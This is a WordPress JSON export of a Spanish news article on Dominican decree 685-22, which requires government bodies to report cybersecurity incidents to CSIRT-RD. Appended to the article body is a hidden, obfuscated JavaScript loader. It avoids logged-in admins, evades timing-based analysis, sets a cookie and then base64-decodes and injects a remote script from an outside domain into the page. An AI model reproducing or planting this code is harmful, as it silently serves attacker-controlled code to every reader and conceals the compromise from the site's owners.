{"id":13008,"date":"2023-01-02T10:55:02","date_gmt":"2023-01-02T14:55:02","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13008"},"modified":"2023-01-02T10:55:02","modified_gmt":"2023-01-02T14:55:02","slug":"disponen-instituciones-publicas-notificar-incidentes-en-infraestructuras-tecnologicas","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13008","title":{"rendered":"Disponen instituciones p\u00fablicas notificar incidentes en infraestructuras tecnol\u00f3gicas"},"content":{"rendered":"<div class=\"share\">\n<div class=\"addthis_inline_share_toolbox_me5k\" data-url=\"https:\/\/www.elcaribe.com.do\/panorama\/pais\/disponen-instituciones-publicas-notificar-incidentes-en-infraestructuras-tecnologicas\/\" data-title=\"Disponen instituciones p\u00fablicas notificar incidentes en infraestructuras tecnol\u00f3gicas\" data-description=\"El presidente de la Rep\u00fablica, Luis Abinader, dispuso mediante el decreto 685-22 que las organizaciones gubernamentales deben notificar\">\n<div id=\"atstbx\" class=\"at-resp-share-element at-style-responsive addthis-smartlayers addthis-animated at4-show\" role=\"region\" aria-labelledby=\"at-78ad12d6-fa0b-4f5f-8d2c-586d78ffc4af\">\n<div class=\"at-share-btn-elements\" style=\"text-align: justify;\"><strong>SANTO DOMINGO. <\/strong>El presidente de la Rep\u00fablica, Luis Abinader, dispuso mediante el decreto 685-22 que las organizaciones gubernamentales deben notificar al CSIRT-RD, del Centro Nacional de Ciberseguridad (CNCS), los incidentes de ciberseguridad ocurridos en sus infraestructuras tecnol\u00f3gicas.<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"content\">\n<p style=\"text-align: justify;\">La medida tiene como objetivo establecer los principios que servir\u00e1n de base a los entes y \u00f3rganos de la administraci\u00f3n p\u00fablica a implementar los controles, pol\u00edticas y est\u00e1ndares para incrementar los niveles de madurez cibern\u00e9tica en el sector y originar el intercambio de informaci\u00f3n sobre amenazas cibern\u00e9ticas, conforme a la Estrategia Nacional de Ciberseguridad 2030. El CNCS es una dependencia del Ministerio de la Presidencia, dirigido por el coronel de la Polic\u00eda Nacional, Juan Gabriel Gautreaux.<\/p>\n<p style=\"text-align: justify;\">La disposici\u00f3n indica que, frente a alg\u00fan incidente, las entidades p\u00fablicas deber\u00e1n reportarlo, siguiendo los procedimientos de gesti\u00f3n al CNCS, dentro de las 24 horas de haber sido detectado, a fin de que se articulen desde el Equipo Nacional de Respuesta a Incidentes Cibern\u00e9ticos (CSIRT-RD) o del CSIRT sectorial, los procedimientos adecuados tendientes a lograr la soluci\u00f3n del incidente declarado.<\/p>\n<p style=\"text-align: justify;\">Independientemente a que el evento haya sido subsanado o mitigado en la brevedad, deber\u00e1 ser comunicado, a fines de alerta temprana a terceros o acciones de coordinaci\u00f3n adicionales.<\/p>\n<p style=\"text-align: justify;\">Para la ejecuci\u00f3n de la medida, el CSIRT-RD desarrollar\u00e1, habilitar\u00e1 y dar\u00e1 a conocer las herramientas y plataformas necesarias para facilitar a los denunciantes, los procesos de notificaci\u00f3n, comunicaci\u00f3n e informaci\u00f3n de incidentes.<\/p>\n<p style=\"text-align: justify;\">Inmediatamente, los entes y \u00f3rganos de la administraci\u00f3n p\u00fablica reciban la informaci\u00f3n, deber\u00e1n efectuar los reportes adicionales o complementarios que permitan al CSIRT-RD actualizar la informaci\u00f3n sobre el incidente, en caso de que se descubriera informaci\u00f3n adicional o diferente a la declarada inicialmente.<\/p>\n<p style=\"text-align: justify;\">Acciones para prevenir y gestionar incidentes de ciberseguridad<\/p>\n<p style=\"text-align: justify;\">Cuando el Centro Nacional de Ciberseguridad haya recibido informaci\u00f3n sobre una amenaza o incidente de ciberseguridad, deber\u00e1 informar al ente u \u00f3rgano regulador competente o al CSIRT sectorial correspondiente para que, ejerciendo sus facultades, realice todas las acciones que sean necesarias para prevenir y gestionar la amenaza o incidente de ciberseguridad.<\/p>\n<p style=\"text-align: justify;\">El decreto especifica que, los responsables de seguridad de la informaci\u00f3n de los \u00f3rganos de la administraci\u00f3n p\u00fablica deber\u00e1n cuidar que las medidas de mitigaci\u00f3n o control del incidente no comprometan la evidencia o la informaci\u00f3n relevante para la investigaci\u00f3n inmediata o a futuro de este.<\/p>\n<p style=\"text-align: justify;\">Asimismo, queda establecido que el CSIRT-RD deber\u00e1 indicar los protocolos, mecanismos, interfaces y herramientas, para facilitar el intercambio de informaci\u00f3n e inteligencia de amenazas cibern\u00e9ticas, as\u00ed como indicadores de compromiso a los entes y \u00f3rganos con el prop\u00f3sito de fortalecer los controles internos.<\/p>\n<p style=\"text-align: justify;\">En caso de existir datos que se encuentren comprometidos ante un incidente detectado, es obligaci\u00f3n de los organismos y entidades del Estado reportar este incidente al CSIRT-RD, as\u00ed como tambi\u00e9n notificar esta situaci\u00f3n a los individuos afectados, comunicando los hechos confirmados y las acciones tomadas o a tomar para su investigaci\u00f3n o mitigaci\u00f3n.<\/p>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SANTO DOMINGO. El presidente de la Rep\u00fablica, Luis Abinader, dispuso mediante el decreto 685-22 que las organizaciones gubernamentales deben notificar al CSIRT-RD, del Centro Nacional de Ciberseguridad (CNCS), los incidentes de ciberseguridad ocurridos en sus infraestructuras tecnol\u00f3gicas. La medida tiene como objetivo establecer los principios que servir\u00e1n de base a los entes y \u00f3rganos de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13010,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13008","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13008","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13008"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13008\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13010"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13008"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13008"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13008"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}